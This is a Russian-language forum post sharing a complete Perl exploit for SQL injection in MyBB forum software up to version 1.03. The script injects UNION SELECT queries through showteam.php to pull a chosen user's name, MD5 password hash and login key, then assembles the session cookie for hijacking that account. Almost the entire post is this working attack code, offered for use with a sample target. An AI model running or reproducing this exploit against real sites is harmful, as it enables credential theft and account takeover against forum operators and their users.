Чё-то это неделя выдалась урожайная на SQL inj сплойты для форумов..... теперь под прицелом оказался MyBulletinBoard <= 1.03 Вот код сплойта Code: #!/bin/env perl #//-------------------------------------------------------------# #// MyBB Forum SQL Injection Exploit .. By HACKERS PAL # #// Greets For Devil-00 - Abducter - Almaster - GaCkeR # #// Special Greets For SG (SecurityGurus) Team And Members # #// http://WwW.SoQoR.NeT # #//-------------------------------------------------------------# use LWP::Simple; print "\n#####################################################"; print "\n# MyBB Forum Exploit By : HACKERS PAL #"; print "\n# Http://WwW.SoQoR.NeT #"; if(!$ARGV[0] or !$ARGV[1]) { print "\n# -- Usage: #"; print "\n# -- perl $0 [Full-Path] [User ID] #"; print "\n# -- Example: #"; print "\n# -- perl $0 http://mods.mybboard.com/forum/ 1 #"; print "\n# Greets To Devil-00 - Abducter - GaCkeR #"; print "\n#####################################################"; exit(0); } else { print "\n# Greets To Devil-00 - Abducter - GaCkeR #"; print "\n#####################################################"; $web=$ARGV[0]; $id=$ARGV[1]; $url = "showteam.php?GLOBALS[]=1&comma=/*"; $site="$web/$url"; $page = get($site) || die "[-] Unable to retrieve: $!"; $page =~ m/FROM (.*)users u WHERE/; $prefix=$1; if(!$1) { $prefix="mybb_"; } $url = "showteam.php?GLOBALS[]=1&comma=- 2)%20union%20select%20uid,username,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null,1,4%20from%20".$prefix. "users%20where%20uid=$id/*"; $site="$web/$url"; $page = get($site) || die "[-] Unable to retrieve: $!"; print "\n[+] Connected to: $ARGV[0]\n"; print "[+] User ID is : $id "; print "\n[+] Table Prefix is : $prefix"; $page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] User Name : $1"; print "\n[-] Unable to retrieve User Name\n" if(!$1); $url = "showteam.php?GLOBALS[]=1&comma=- 2)%20union%20select%20uid,password,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null,1,4%20from%20".$prefix. "users%20where%20uid=$id/*"; $site="$web/$url"; $page = get($site) || die "[-] Unable to retrieve: $!"; $page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] Md5 Hash of Password : $1\n"; die("\n[-] Unable to retrieve The Hash of password\n") if(!$1); print"\n[!] Watch out ... The Cookie Value is comming\n"; $url = "showteam.php?GLOBALS[]=1&comma=- 2)%20union%20select%20uid,loginkey,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null,1,4%20from%20".$prefix. "users%20where%20uid=$id/*"; $site="$web/$url"; $page = get($site) || die "[-] Unable to retrieve: $!"; $page =~ m/<b><i>(.*)<\/i><\/b>/ && print "[+] Cookie [mybbuser] Value:-\n[*] $id"."_"."$1\n"; print "[-] Unable to retrieve Login Key\n" if(!$1); }
